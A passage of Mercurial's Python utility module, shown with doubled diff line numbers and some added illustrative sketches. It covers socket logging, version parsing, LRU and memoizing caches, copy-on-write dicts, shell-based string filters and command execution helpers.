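    proxy.flush() # log handle sees "example> flush() -> None"
    return proxy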
944 944 class socketobserver(baseproxyobserver):
945 945 """Logs socket activity."""
946 946 def __init__(self, fh, name, reads=True, writes=True, states=True,
947 947 logdata=False, logdataapis=True):
948 948 self.fh = fh
949 949 self.name = name
950 950 self.reads = reads
951 951 self.writes = writes
952 952 self.states = states
953 953 self.logdata = logdata
954 954 self.logdataapis = logdataapis
955 955
956 956 def makefile(self, res, mode=None, bufsize=None):
957 957 if not self.states:
958 958 return
959 959
960 960 self.fh.write('%s> makefile(%r, %r)\n' % (
961 961 self.name, mode, bufsize))
962 962
963 963 def recv(self, res, size, flags=0):
964 964 if not self.reads:
965 965 return
966 966
967 967 if self.logdataapis:
968 968 self.fh.write('%s> recv(%d, %d) -> %d' % (
969 969 self.name, size, flags, len(res)))
970 970 self._writedata(res)
971 971
972 972 def recvfrom(self, res, size, flags=0):
973 973 if not self.reads:
974 974 return
975 975
976 976 if self.logdataapis:
977 977 self.fh.write('%s> recvfrom(%d, %d) -> %d' % (
978 978 self.name, size, flags, len(res[0])))
979 979
980 980 self._writedata(res[0])
981 981
982 982 def recvfrom_into(self, res, buf, size, flags=0):
983 983 if not self.reads:
984 984 return
985 985
986 986 if self.logdataapis:
987 987 self.fh.write('%s> recvfrom_into(%d, %d) -> %d' % (
988 988 self.name, size, flags, res[0]))
989 989
990 990 self._writedata(buf[0:res[0]])
991 991
992 992 def recv_into(self, res, buf, size=0, flags=0):
993 993 if not self.reads:
994 994 return
995 995
996 996 if self.logdataapis:
997 997 self.fh.write('%s> recv_into(%d, %d) -> %d' % (
998 998 self.name, size, flags, res))
999 999
1000 1000 self._writedata(buf[0:res])
1001 1001
1002 1002 def send(self, res, data, flags=0):
1003 1003 if not self.writes:
1004 1004 return
1005 1005
1006 1006 self.fh.write('%s> send(%d, %d) -> %d' % (
1007 1007 self.name, len(data), flags, len(res)))
1008 1008 self._writedata(data)
1009 1009
1010 1010 def sendall(self, res, data, flags=0):
1011 1011 if not self.writes:
1012 1012 return
1013 1013
1014 1014 if self.logdataapis:
1015 1015 # Returns None on success. So don't bother reporting return value.
1016 1016 self.fh.write('%s> sendall(%d, %d)' % (
1017 1017 self.name, len(data), flags))
1018 1018
1019 1019 self._writedata(data)
1020 1020
1021 1021 def sendto(self, res, data, flagsoraddress, address=None):
1022 1022 if not self.writes:
1023 1023 return
1024 1024
1025 1025 if address:
1026 1026 flags = flagsoraddress
1027 1027 else:
1028 1028 flags = 0
1029 1029
1030 1030 if self.logdataapis:
1031 1031 self.fh.write('%s> sendto(%d, %d, %r) -> %d' % (
1032 1032 self.name, len(data), flags, address, res))
1033 1033
1034 1034 self._writedata(data)
1035 1035
1036 1036 def setblocking(self, res, flag):
1037 1037 if not self.states:
1038 1038 return
1039 1039
1040 1040 self.fh.write('%s> setblocking(%r)\n' % (self.name, flag))
1041 1041
1042 1042 def settimeout(self, res, value):
1043 1043 if not self.states:
1044 1044 return
1045 1045
1046 1046 self.fh.write('%s> settimeout(%r)\n' % (self.name, value))
1047 1047
1048 1048 def gettimeout(self, res):
1049 1049 if not self.states:
1050 1050 return
1051 1051
1052 1052 self.fh.write('%s> gettimeout() -> %f\n' % (self.name, res))
1053 1053
1054 1054 def setsockopt(self, res, level, optname, value):
1055 1055 if not self.states:
1056 1056 return
1057 1057 
1058 1058 self.fh.write('%s> setsockopt(%r, %r, %r) -> %r\n' % (
1059 1059 self.name, level, optname, value, res))
1060 1060
1061 1061 def makeloggingsocket(logh, fh, name, reads=True, writes=True, states=True,
1062 1062 logdata=False, logdataapis=True):
1063 1063 """Turn a socket into a logging socket."""
1064 1064
1065 1065 observer = socketobserver(logh, name, reads=reads, writes=writes,
1066 1066 states=states, logdata=logdata,
1067 1067 logdataapis=logdataapis)
1068 1068 return socketproxy(fh, observer)
1069 1069
1070 1070 def version():
1071 1071 """Return version information if available."""
1072 1072 try:
1073 1073 from . import __version__
1074 1074 return __version__.version
1075 1075 except ImportError:
1076 1076 return 'unknown'
1077 1077
1078 1078 def versiontuple(v=None, n=4):
1079 1079 """Parses a Mercurial version string into an N-tuple.
1080 1080
1081 1081 The version string to be parsed is specified with the ``v`` argument.
1082 1082 If it isn't defined, the current Mercurial version string will be parsed.
1083 1083
1084 1084 ``n`` can be 2, 3, or 4. Here is how some version strings map to
1085 1085 returned values:
1086 1086
1087 1087 >>> v = b'3.6.1+190-df9b73d2d444'
1088 1088 >>> versiontuple(v, 2)
1089 1089 (3, 6)
1090 1090 >>> versiontuple(v, 3)
1091 1091 (3, 6, 1)
1092 1092 >>> versiontuple(v, 4)
1093 1093 (3, 6, 1, '190-df9b73d2d444')
1094 1094
1095 1095 >>> versiontuple(b'3.6.1+190-df9b73d2d444+20151118')
1096 1096 (3, 6, 1, '190-df9b73d2d444+20151118')
1097 1097
1098 1098 >>> v = b'3.6'
1099 1099 >>> versiontuple(v, 2)
1100 1100 (3, 6)
1101 1101 >>> versiontuple(v, 3)
1102 1102 (3, 6, None)
1103 1103 >>> versiontuple(v, 4)
1104 1104 (3, 6, None, None)
1105 1105
1106 1106 >>> v = b'3.9-rc'
1107 1107 >>> versiontuple(v, 2)
1108 1108 (3, 9)
1109 1109 >>> versiontuple(v, 3)
1110 1110 (3, 9, None)
1111 1111 >>> versiontuple(v, 4)
1112 1112 (3, 9, None, 'rc')
1113 1113
1114 1114 >>> v = b'3.9-rc+2-02a8fea4289b'
1115 1115 >>> versiontuple(v, 2)
1116 1116 (3, 9)
1117 1117 >>> versiontuple(v, 3)
1118 1118 (3, 9, None)
1119 1119 >>> versiontuple(v, 4)
1120 1120 (3, 9, None, 'rc+2-02a8fea4289b')
1121 1121 """
1122 1122 if not v:
1123 1123 v = version()
1124 1124 parts = remod.split('[\+-]', v, 1)
1125 1125 if len(parts) == 1:
1126 1126 vparts, extra = parts[0], None
1127 1127 else:
1128 1128 vparts, extra = parts
1129 1129
1130 1130 vints = []
1131 1131 for i in vparts.split('.'):
1132 1132 try:
1133 1133 vints.append(int(i))
1134 1134 except ValueError:
1135 1135 break
1136 1136 # (3, 6) -> (3, 6, None)
1137 1137 while len(vints) < 3:
1138 1138 vints.append(None)
1139 1139
1140 1140 if n == 2:
1141 1141 return (vints[0], vints[1])
1142 1142 if n == 3:
1143 1143 return (vints[0], vints[1], vints[2])
1144 1144 if n == 4:
1145 1145 return (vints[0], vints[1], vints[2], extra)
1146 1146
1147 1147 def cachefunc(func):
1148 1148 '''cache the result of function calls'''
1149 1149 # XXX doesn't handle keyword args
1150 1150 if func.__code__.co_argcount == 0:
1151 1151 cache = []
1152 1152 def f():
1153 1153 if len(cache) == 0:
1154 1154 cache.append(func())
1155 1155 return cache[0]
1156 1156 return f
1157 1157 cache = {}
1158 1158 if func.__code__.co_argcount == 1:
1159 1159 # we gain a small amount of time because
1160 1160 # we don't need to pack/unpack the list
1161 1161 def f(arg):
1162 1162 if arg not in cache:
1163 1163 cache[arg] = func(arg)
1164 1164 return cache[arg]
1165 1165 else:
1166 1166 def f(*args):
1167 1167 if args not in cache:
1168 1168 cache[args] = func(*args)
1169 1169 return cache[args]
1170 1170
1171 1171 return f
1172 1172
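# A small sketch of cachefunc (illustrative only; ``_double`` is a made-up
# single-argument function): repeated calls with the same argument are served
# from the memoizing wrapper instead of re-running the function.
def _sketchcachefunc():
    calls = []
    def _double(x):
        calls.append(x)
        return x * 2
    cached = cachefunc(_double)
    cached(21)
    cached(21) # second call hits the cache; _double runs only once
    return len(calls) # -> 1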
1173 1173 class cow(object):
1174 1174 """helper class to make copy-on-write easier
1175 1175
1176 1176 Call preparewrite before doing any writes.
1177 1177 """
1178 1178
1179 1179 def preparewrite(self):
1180 1180 """call this before writes, return self or a copied new object"""
1181 1181 if getattr(self, '_copied', 0):
1182 1182 self._copied -= 1
1183 1183 return self.__class__(self)
1184 1184 return self
1185 1185
1186 1186 def copy(self):
1187 1187 """always do a cheap copy"""
1188 1188 self._copied = getattr(self, '_copied', 0) + 1
1189 1189 return self
1190 1190
1191 1191 class sortdict(collections.OrderedDict):
1192 1192 '''a simple sorted dictionary
1193 1193
1194 1194 >>> d1 = sortdict([(b'a', 0), (b'b', 1)])
1195 1195 >>> d2 = d1.copy()
1196 1196 >>> d2
1197 1197 sortdict([('a', 0), ('b', 1)])
1198 1198 >>> d2.update([(b'a', 2)])
1199 1199 >>> list(d2.keys()) # should still be in last-set order
1200 1200 ['b', 'a']
1201 1201 '''
1202 1202
1203 1203 def __setitem__(self, key, value):
1204 1204 if key in self:
1205 1205 del self[key]
1206 1206 super(sortdict, self).__setitem__(key, value)
1207 1207
1208 1208 if pycompat.ispypy:
1209 1209 # __setitem__() isn't called as of PyPy 5.8.0
1210 1210 def update(self, src):
1211 1211 if isinstance(src, dict):
1212 1212 src = src.iteritems()
1213 1213 for k, v in src:
1214 1214 self[k] = v
1215 1215
1216 1216 class cowdict(cow, dict):
1217 1217 """copy-on-write dict
1218 1218
1219 1219 Be sure to call d = d.preparewrite() before writing to d.
1220 1220
1221 1221 >>> a = cowdict()
1222 1222 >>> a is a.preparewrite()
1223 1223 True
1224 1224 >>> b = a.copy()
1225 1225 >>> b is a
1226 1226 True
1227 1227 >>> c = b.copy()
1228 1228 >>> c is a
1229 1229 True
1230 1230 >>> a = a.preparewrite()
1231 1231 >>> b is a
1232 1232 False
1233 1233 >>> a is a.preparewrite()
1234 1234 True
1235 1235 >>> c = c.preparewrite()
1236 1236 >>> b is c
1237 1237 False
1238 1238 >>> b is b.preparewrite()
1239 1239 True
1240 1240 """
1241 1241
1242 1242 class cowsortdict(cow, sortdict):
1243 1243 """copy-on-write sortdict
1244 1244
1245 1245 Be sure to call d = d.preparewrite() before writing to d.
1246 1246 """
1247 1247
1248 1248 class transactional(object):
1249 1249 """Base class for making a transactional type into a context manager."""
1250 1250 __metaclass__ = abc.ABCMeta
1251 1251
1252 1252 @abc.abstractmethod
1253 1253 def close(self):
1254 1254 """Successfully closes the transaction."""
1255 1255
1256 1256 @abc.abstractmethod
1257 1257 def release(self):
1258 1258 """Marks the end of the transaction.
1259 1259
1260 1260 If the transaction has not been closed, it will be aborted.
1261 1261 """
1262 1262
1263 1263 def __enter__(self):
1264 1264 return self
1265 1265
1266 1266 def __exit__(self, exc_type, exc_val, exc_tb):
1267 1267 try:
1268 1268 if exc_type is None:
1269 1269 self.close()
1270 1270 finally:
1271 1271 self.release()
1272 1272
1273 1273 @contextlib.contextmanager
1274 1274 def acceptintervention(tr=None):
1275 1275 """A context manager that closes the transaction on InterventionRequired
1276 1276
1277 1277 If no transaction was provided, this simply runs the body and returns
1278 1278 """
1279 1279 if not tr:
1280 1280 yield
1281 1281 return
1282 1282 try:
1283 1283 yield
1284 1284 tr.close()
1285 1285 except error.InterventionRequired:
1286 1286 tr.close()
1287 1287 raise
1288 1288 finally:
1289 1289 tr.release()
1290 1290
1291 1291 @contextlib.contextmanager
1292 1292 def nullcontextmanager():
1293 1293 yield
1294 1294
1295 1295 class _lrucachenode(object):
1296 1296 """A node in a doubly linked list.
1297 1297
1298 1298 Holds a reference to nodes on either side as well as a key-value
1299 1299 pair for the dictionary entry.
1300 1300 """
1301 1301 __slots__ = (u'next', u'prev', u'key', u'value')
1302 1302
1303 1303 def __init__(self):
1304 1304 self.next = None
1305 1305 self.prev = None
1306 1306
1307 1307 self.key = _notset
1308 1308 self.value = None
1309 1309
1310 1310 def markempty(self):
1311 1311 """Mark the node as emptied."""
1312 1312 self.key = _notset
1313 1313
1314 1314 class lrucachedict(object):
1315 1315 """Dict that caches most recent accesses and sets.
1316 1316
1317 1317 The dict consists of an actual backing dict - indexed by original
1318 1318 key - and a doubly linked circular list defining the order of entries in
1319 1319 the cache.
1320 1320
1321 1321 The head node is the newest entry in the cache. If the cache is full,
1322 1322 we recycle head.prev and make it the new head. Cache accesses result in
1323 1323 the node being moved to before the existing head and being marked as the
1324 1324 new head node.
1325 1325 """
1326 1326 def __init__(self, max):
1327 1327 self._cache = {}
1328 1328
1329 1329 self._head = head = _lrucachenode()
1330 1330 head.prev = head
1331 1331 head.next = head
1332 1332 self._size = 1
1333 1333 self._capacity = max
1334 1334
1335 1335 def __len__(self):
1336 1336 return len(self._cache)
1337 1337
1338 1338 def __contains__(self, k):
1339 1339 return k in self._cache
1340 1340
1341 1341 def __iter__(self):
1342 1342 # We don't have to iterate in cache order, but why not.
1343 1343 n = self._head
1344 1344 for i in range(len(self._cache)):
1345 1345 yield n.key
1346 1346 n = n.next
1347 1347
1348 1348 def __getitem__(self, k):
1349 1349 node = self._cache[k]
1350 1350 self._movetohead(node)
1351 1351 return node.value
1352 1352
1353 1353 def __setitem__(self, k, v):
1354 1354 node = self._cache.get(k)
1355 1355 # Replace existing value and mark as newest.
1356 1356 if node is not None:
1357 1357 node.value = v
1358 1358 self._movetohead(node)
1359 1359 return
1360 1360
1361 1361 if self._size < self._capacity:
1362 1362 node = self._addcapacity()
1363 1363 else:
1364 1364 # Grab the last/oldest item.
1365 1365 node = self._head.prev
1366 1366
1367 1367 # At capacity. Kill the old entry.
1368 1368 if node.key is not _notset:
1369 1369 del self._cache[node.key]
1370 1370
1371 1371 node.key = k
1372 1372 node.value = v
1373 1373 self._cache[k] = node
1374 1374 # And mark it as newest entry. No need to adjust order since it
1375 1375 # is already self._head.prev.
1376 1376 self._head = node
1377 1377
1378 1378 def __delitem__(self, k):
1379 1379 node = self._cache.pop(k)
1380 1380 node.markempty()
1381 1381
1382 1382 # Temporarily mark as newest item before re-adjusting head to make
1383 1383 # this node the oldest item.
1384 1384 self._movetohead(node)
1385 1385 self._head = node.next
1386 1386
1387 1387 # Additional dict methods.
1388 1388
1389 1389 def get(self, k, default=None):
1390 1390 try:
1391 1391 return self._cache[k].value
1392 1392 except KeyError:
1393 1393 return default
1394 1394
1395 1395 def clear(self):
1396 1396 n = self._head
1397 1397 while n.key is not _notset:
1398 1398 n.markempty()
1399 1399 n = n.next
1400 1400
1401 1401 self._cache.clear()
1402 1402
1403 1403 def copy(self):
1404 1404 result = lrucachedict(self._capacity)
1405 1405 n = self._head.prev
1406 1406 # Iterate in oldest-to-newest order, so the copy has the right ordering
1407 1407 for i in range(len(self._cache)):
1408 1408 result[n.key] = n.value
1409 1409 n = n.prev
1410 1410 return result
1411 1411
1412 1412 def _movetohead(self, node):
1413 1413 """Mark a node as the newest, making it the new head.
1414 1414
1415 1415 When a node is accessed, it becomes the freshest entry in the LRU
1416 1416 list, which is denoted by self._head.
1417 1417
1418 1418 Visually, let's make ``N`` the new head node (* denotes head):
1419 1419
1420 1420 previous/oldest <-> head <-> next/next newest
1421 1421
1422 1422 ----<->--- A* ---<->-----
1423 1423 | |
1424 1424 E <-> D <-> N <-> C <-> B
1425 1425
1426 1426 To:
1427 1427
1428 1428 ----<->--- N* ---<->-----
1429 1429 | |
1430 1430 E <-> D <-> C <-> B <-> A
1431 1431
1432 1432 This requires the following moves:
1433 1433
1434 1434 C.next = D (node.prev.next = node.next)
1435 1435 D.prev = C (node.next.prev = node.prev)
1436 1436 E.next = N (head.prev.next = node)
1437 1437 N.prev = E (node.prev = head.prev)
1438 1438 N.next = A (node.next = head)
1439 1439 A.prev = N (head.prev = node)
1440 1440 """
1441 1441 head = self._head
1442 1442 # C.next = D
1443 1443 node.prev.next = node.next
1444 1444 # D.prev = C
1445 1445 node.next.prev = node.prev
1446 1446 # N.prev = E
1447 1447 node.prev = head.prev
1448 1448 # N.next = A
1449 1449 # It is tempting to do just "head" here, however if node is
1450 1450 # adjacent to head, this will do bad things.
1451 1451 node.next = head.prev.next
1452 1452 # E.next = N
1453 1453 node.next.prev = node
1454 1454 # A.prev = N
1455 1455 node.prev.next = node
1456 1456
1457 1457 self._head = node
1458 1458
1459 1459 def _addcapacity(self):
1460 1460 """Add a node to the circular linked list.
1461 1461
1462 1462 The new node is inserted before the head node.
1463 1463 """
1464 1464 head = self._head
1465 1465 node = _lrucachenode()
1466 1466 head.prev.next = node
1467 1467 node.prev = head.prev
1468 1468 node.next = head
1469 1469 head.prev = node
1470 1470 self._size += 1
1471 1471 return node
1472 1472
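# A short sketch of lrucachedict (illustrative only; the two-entry capacity
# and the byte-string keys are arbitrary): reading b'a' refreshes it, so
# adding a third key evicts b'b', the least recently used entry.
def _sketchlrucachedict():
    d = lrucachedict(2)
    d[b'a'] = 1
    d[b'b'] = 2
    d[b'a'] # access moves b'a' to the head of the LRU list
    d[b'c'] = 3 # at capacity: recycles the oldest node, evicting b'b'
    return b'b' in d # -> False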
1473 1473 def lrucachefunc(func):
1474 1474 '''cache most recent results of function calls'''
1475 1475 cache = {}
1476 1476 order = collections.deque()
1477 1477 if func.__code__.co_argcount == 1:
1478 1478 def f(arg):
1479 1479 if arg not in cache:
1480 1480 if len(cache) > 20:
1481 1481 del cache[order.popleft()]
1482 1482 cache[arg] = func(arg)
1483 1483 else:
1484 1484 order.remove(arg)
1485 1485 order.append(arg)
1486 1486 return cache[arg]
1487 1487 else:
1488 1488 def f(*args):
1489 1489 if args not in cache:
1490 1490 if len(cache) > 20:
1491 1491 del cache[order.popleft()]
1492 1492 cache[args] = func(*args)
1493 1493 else:
1494 1494 order.remove(args)
1495 1495 order.append(args)
1496 1496 return cache[args]
1497 1497
1498 1498 return f
1499 1499
1500 1500 class propertycache(object):
1501 1501 def __init__(self, func):
1502 1502 self.func = func
1503 1503 self.name = func.__name__
1504 1504 def __get__(self, obj, type=None):
1505 1505 result = self.func(obj)
1506 1506 self.cachevalue(obj, result)
1507 1507 return result
1508 1508
1509 1509 def cachevalue(self, obj, value):
1510 1510 # __dict__ assignment required to bypass __setattr__ (eg: repoview)
1511 1511 obj.__dict__[self.name] = value
1512 1512
1513 1513 def clearcachedproperty(obj, prop):
1514 1514 '''clear a cached property value, if one has been set'''
1515 1515 if prop in obj.__dict__:
1516 1516 del obj.__dict__[prop]
1517 1517
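# A brief sketch of propertycache and clearcachedproperty (illustrative only;
# ``_sketchcached`` and its ``answer`` property are made-up names): the first
# access runs the function and stores the result on the instance.
class _sketchcached(object):
    @propertycache
    def answer(self):
        return 42 # computed once; later reads find it in the instance __dict__

def _sketchpropertycache():
    obj = _sketchcached()
    value = obj.answer # computes and caches 42
    clearcachedproperty(obj, r'answer') # the next access would recompute
    return value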
1518 1518 def pipefilter(s, cmd):
1519 1519 '''filter string S through command CMD, returning its output'''
1520 1520 p = subprocess.Popen(cmd, shell=True, close_fds=closefds,
1521 1521 stdin=subprocess.PIPE, stdout=subprocess.PIPE)
1522 1522 pout, perr = p.communicate(s)
1523 1523 return pout
1524 1524
1525 1525 def tempfilter(s, cmd):
1526 1526 '''filter string S through a pair of temporary files with CMD.
1527 1527 CMD is used as a template to create the real command to be run,
1528 1528 with the strings INFILE and OUTFILE replaced by the real names of
1529 1529 the temporary files generated.'''
1530 1530 inname, outname = None, None
1531 1531 try:
1532 1532 infd, inname = tempfile.mkstemp(prefix='hg-filter-in-')
1533 1533 fp = os.fdopen(infd, r'wb')
1534 1534 fp.write(s)
1535 1535 fp.close()
1536 1536 outfd, outname = tempfile.mkstemp(prefix='hg-filter-out-')
1537 1537 os.close(outfd)
1538 1538 cmd = cmd.replace('INFILE', inname)
1539 1539 cmd = cmd.replace('OUTFILE', outname)
1540 1540 code = os.system(cmd)
1541 1541 if pycompat.sysplatform == 'OpenVMS' and code & 1:
1542 1542 code = 0
1543 1543 if code:
1544 1544 raise Abort(_("command '%s' failed: %s") %
1545 1545 (cmd, explainexit(code)))
1546 1546 return readfile(outname)
1547 1547 finally:
1548 1548 try:
1549 1549 if inname:
1550 1550 os.unlink(inname)
1551 1551 except OSError:
1552 1552 pass
1553 1553 try:
1554 1554 if outname:
1555 1555 os.unlink(outname)
1556 1556 except OSError:
1557 1557 pass
1558 1558
1559 1559 filtertable = {
1560 1560 'tempfile:': tempfilter,
1561 1561 'pipe:': pipefilter,
1562 1562 }
1563 1563
1564 1564 def filter(s, cmd):
1565 1565 "filter a string through a command that transforms its input to its output"
1566 1566 for name, fn in filtertable.iteritems():
1567 1567 if cmd.startswith(name):
1568 1568 return fn(s, cmd[len(name):].lstrip())
1569 1569 return pipefilter(s, cmd)
1570 1570
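# A minimal sketch of the filter table (illustrative only; it assumes a POSIX
# ``tr`` binary is available): the b'pipe:' prefix selects pipefilter, which
# feeds the string to the external command and returns its output.
def _sketchfilter(data):
    return filter(data, b'pipe: tr a-z A-Z') # b'ok' -> b'OK'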
1571 1571 def binary(s):
1572 1572 """return true if a string is binary data"""
1573 1573 return bool(s and '\0' in s)
1574 1574
1575 1575 def increasingchunks(source, min=1024, max=65536):
1576 1576 '''return no less than min bytes per chunk while data remains,
1577 1577 doubling min after each chunk until it reaches max'''
1578 1578 def log2(x):
1579 1579 if not x:
1580 1580 return 0
1581 1581 i = 0
1582 1582 while x:
1583 1583 x >>= 1
1584 1584 i += 1
1585 1585 return i - 1
1586 1586
1587 1587 buf = []
1588 1588 blen = 0
1589 1589 for chunk in source:
1590 1590 buf.append(chunk)
1591 1591 blen += len(chunk)
1592 1592 if blen >= min:
1593 1593 if min < max:
1594 1594 min = min << 1
1595 1595 nmin = 1 << log2(blen)
1596 1596 if nmin > min:
1597 1597 min = nmin
1598 1598 if min > max:
1599 1599 min = max
1600 1600 yield ''.join(buf)
1601 1601 blen = 0
1602 1602 buf = []
1603 1603 if buf:
1604 1604 yield ''.join(buf)
1605 1605
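# A short sketch of increasingchunks (illustrative only; the 1 KiB feed and
# the min/max bounds are arbitrary): emitted chunks grow from ``min`` toward
# ``max`` while data keeps arriving, then the remainder is flushed.
def _sketchincreasingchunks():
    source = (b'x' * 1024 for _ in range(8))
    # chunk sizes come out as [1024, 2048, 4096, 1024] for this feed
    return [len(c) for c in increasingchunks(source, min=1024, max=4096)]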
1606 1606 Abort = error.Abort
1607 1607
1608 1608 def always(fn):
1609 1609 return True
1610 1610
1611 1611 def never(fn):
1612 1612 return False
1613 1613
1614 1614 def nogc(func):
1615 1615 """disable garbage collector
1616 1616
1617 1617 Python's garbage collector triggers a GC each time a certain number of
1618 1618 container objects (the number being defined by gc.get_threshold()) are
1619 1619 allocated even when marked not to be tracked by the collector. Tracking has
1620 1620 no effect on when GCs are triggered, only on what objects the GC looks
1621 1621 into. As a workaround, disable GC while building complex (huge)
1622 1622 containers.
1623 1623
1624 1624 This garbage collector issue has been fixed in 2.7, but it still affects
1625 1625 CPython's performance.
1626 1626 """
1627 1627 def wrapper(*args, **kwargs):
1628 1628 gcenabled = gc.isenabled()
1629 1629 gc.disable()
1630 1630 try:
1631 1631 return func(*args, **kwargs)
1632 1632 finally:
1633 1633 if gcenabled:
1634 1634 gc.enable()
1635 1635 return wrapper
1636 1636
1637 1637 if pycompat.ispypy:
1638 1638 # PyPy runs slower with gc disabled
1639 1639 nogc = lambda x: x
1640 1640
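# A tiny sketch of nogc (illustrative only; ``_sketchbuildmap`` is a made-up
# function): decorating container-heavy code keeps the collector disabled for
# the duration of the call and restores it afterwards.
@nogc
def _sketchbuildmap(entries):
    # building a large dict is exactly the allocation pattern nogc targets
    return dict((e, True) for e in entries)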
1641 1641 def pathto(root, n1, n2):
1642 1642 '''return the relative path from one place to another.
1643 1643 root should use os.sep to separate directories
1644 1644 n1 should use os.sep to separate directories
1645 1645 n2 should use "/" to separate directories
1646 1646 returns an os.sep-separated path.
1647 1647
1648 1648 If n1 is a relative path, it is assumed to be
1649 1649 relative to root.
1650 1650 n2 should always be relative to root.
1651 1651 '''
1652 1652 if not n1:
1653 1653 return localpath(n2)
1654 1654 if os.path.isabs(n1):
1655 1655 if os.path.splitdrive(root)[0] != os.path.splitdrive(n1)[0]:
1656 1656 return os.path.join(root, localpath(n2))
1657 1657 n2 = '/'.join((pconvert(root), n2))
1658 1658 a, b = splitpath(n1), n2.split('/')
1659 1659 a.reverse()
1660 1660 b.reverse()
1661 1661 while a and b and a[-1] == b[-1]:
1662 1662 a.pop()
1663 1663 b.pop()
1664 1664 b.reverse()
1665 1665 return pycompat.ossep.join((['..'] * len(a)) + b) or '.'
1666 1666
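# A compact sketch of pathto (illustrative only; the root and file names are
# made up): from the working-directory path b'a/x' inside a repository rooted
# at b'/repo', the repo-relative file b'a/y/f' is reached via b'../y/f'
# (joined with os.sep, so the exact separator depends on the platform).
def _sketchpathto():
    return pathto(b'/repo', b'a/x', b'a/y/f') # -> b'../y/f' on POSIX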
1667 1667 def mainfrozen():
1668 1668 """return True if we are a frozen executable.
1669 1669
1670 1670 The code supports py2exe (most common, Windows only) and tools/freeze
1671 1671 (portable, not much used).
1672 1672 """
1673 1673 return (safehasattr(sys, "frozen") or # new py2exe
1674 1674 safehasattr(sys, "importers") or # old py2exe
1675 1675 imp.is_frozen(u"__main__")) # tools/freeze
1676 1676
1677 1677 # the location of data files matching the source code
1678 1678 if mainfrozen() and getattr(sys, 'frozen', None) != 'macosx_app':
1679 1679 # executable version (py2exe) doesn't support __file__
1680 1680 datapath = os.path.dirname(pycompat.sysexecutable)
1681 1681 else:
1682 1682 datapath = os.path.dirname(pycompat.fsencode(__file__))
1683 1683
1684 1684 i18n.setdatapath(datapath)
1685 1685
1686 1686 _hgexecutable = None
1687 1687
1688 1688 def hgexecutable():
1689 1689 """return location of the 'hg' executable.
1690 1690
1691 1691 Defaults to $HG or 'hg' in the search path.
1692 1692 """
1693 1693 if _hgexecutable is None:
1694 1694 hg = encoding.environ.get('HG')
1695 1695 mainmod = sys.modules[r'__main__']
1696 1696 if hg:
1697 1697 _sethgexecutable(hg)
1698 1698 elif mainfrozen():
1699 1699 if getattr(sys, 'frozen', None) == 'macosx_app':
1700 1700 # Env variable set by py2app
1701 1701 _sethgexecutable(encoding.environ['EXECUTABLEPATH'])
1702 1702 else:
1703 1703 _sethgexecutable(pycompat.sysexecutable)
1704 1704 elif (os.path.basename(
1705 1705 pycompat.fsencode(getattr(mainmod, '__file__', ''))) == 'hg'):
1706 1706 _sethgexecutable(pycompat.fsencode(mainmod.__file__))
1707 1707 else:
1708 1708 exe = findexe('hg') or os.path.basename(sys.argv[0])
1709 1709 _sethgexecutable(exe)
1710 1710 return _hgexecutable
1711 1711
1712 1712 def _sethgexecutable(path):
1713 1713 """set location of the 'hg' executable"""
1714 1714 global _hgexecutable
1715 1715 _hgexecutable = path
1716 1716
1717 1717 def _testfileno(f, stdf):
1718 1718 fileno = getattr(f, 'fileno', None)
1719 1719 try:
1720 1720 return fileno and fileno() == stdf.fileno()
1721 1721 except io.UnsupportedOperation:
1722 1722 return False # fileno() raised UnsupportedOperation
1723 1723
1724 1724 def isstdin(f):
1725 1725 return _testfileno(f, sys.__stdin__)
1726 1726
1727 1727 def isstdout(f):
1728 1728 return _testfileno(f, sys.__stdout__)
1729 1729
1730 1730 def shellenviron(environ=None):
1731 1731 """return environ with optional override, useful for shelling out"""
1732 1732 def py2shell(val):
1733 1733 'convert python object into string that is useful to shell'
1734 1734 if val is None or val is False:
1735 1735 return '0'
1736 1736 if val is True:
1737 1737 return '1'
1738 1738 return pycompat.bytestr(val)
1739 1739 env = dict(encoding.environ)
1740 1740 if environ:
1741 1741 env.update((k, py2shell(v)) for k, v in environ.iteritems())
1742 1742 env['HG'] = hgexecutable()
1743 1743 return env
1744 1744
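# A hedged sketch of what shellenviron() produces (keys and values are
# illustrative): the current environment is copied, True/False/None values
# are flattened so shell hooks can test them numerically, and HG always
# points at the hg executable.
#
#   >>> env = shellenviron({b'HG_PENDING': True, b'HG_NODE': None})
#   >>> env[b'HG_PENDING'], env[b'HG_NODE']
#   ('1', '0')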
1745 1745 def system(cmd, environ=None, cwd=None, out=None):
1746 1746 '''enhanced shell command execution.
1747 1747 run with the environment possibly modified, possibly in a different dir.
1748 1748
1749 1749 if out is specified, it is assumed to be a file-like object that has a
1750 1750 write() method. stdout and stderr will be redirected to out.'''
1751 1751 try:
1752 1752 stdout.flush()
1753 1753 except Exception:
1754 1754 pass
1755 1755 cmd = quotecommand(cmd)
1756 1756 env = shellenviron(environ)
1757 1757 if out is None or isstdout(out):
1758 1758 rc = subprocess.call(cmd, shell=True, close_fds=closefds,
1759 1759 env=env, cwd=cwd)
1760 1760 else:
1761 1761 proc = subprocess.Popen(cmd, shell=True, close_fds=closefds,
1762 1762 env=env, cwd=cwd, stdout=subprocess.PIPE,
1763 1763 stderr=subprocess.STDOUT)
1764 1764 for line in iter(proc.stdout.readline, ''):
1765 1765 out.write(line)
1766 1766 proc.wait()
1767 1767 rc = proc.returncode
1768 1768 if pycompat.sysplatform == 'OpenVMS' and rc & 1:
1769 1769 rc = 0
1770 1770 return rc
1771 1771
1772 1772 def checksignature(func):
1773 1773 '''wrap a function with code to check for calling errors'''
1774 1774 def check(*args, **kwargs):
1775 1775 try:
1776 1776 return func(*args, **kwargs)
1777 1777 except TypeError:
1778 1778 if len(traceback.extract_tb(sys.exc_info()[2])) == 1:
1779 1779 raise error.SignatureError
1780 1780 raise
1781 1781
1782 1782 return check
1783 1783
1784 1784 # a whitelist of known filesystems where hardlinks work reliably
1785 1785 _hardlinkfswhitelist = {
1786 1786 'btrfs',
1787 1787 'ext2',
1788 1788 'ext3',
1789 1789 'ext4',
1790 1790 'hfs',
1791 1791 'jfs',
1792 1792 'NTFS',
1793 1793 'reiserfs',
1794 1794 'tmpfs',
1795 1795 'ufs',
1796 1796 'xfs',
1797 1797 'zfs',
1798 1798 }
1799 1799
1800 1800 def copyfile(src, dest, hardlink=False, copystat=False, checkambig=False):
1801 1801 '''copy a file, preserving mode and optionally other stat info like
1802 1802 atime/mtime
1803 1803
1804 1804 checkambig argument is used with filestat, and is useful only if
1805 1805 destination file is guarded by any lock (e.g. repo.lock or
1806 1806 repo.wlock).
1807 1807
1808 1808 copystat and checkambig should be exclusive.
1809 1809 '''
1810 1810 assert not (copystat and checkambig)
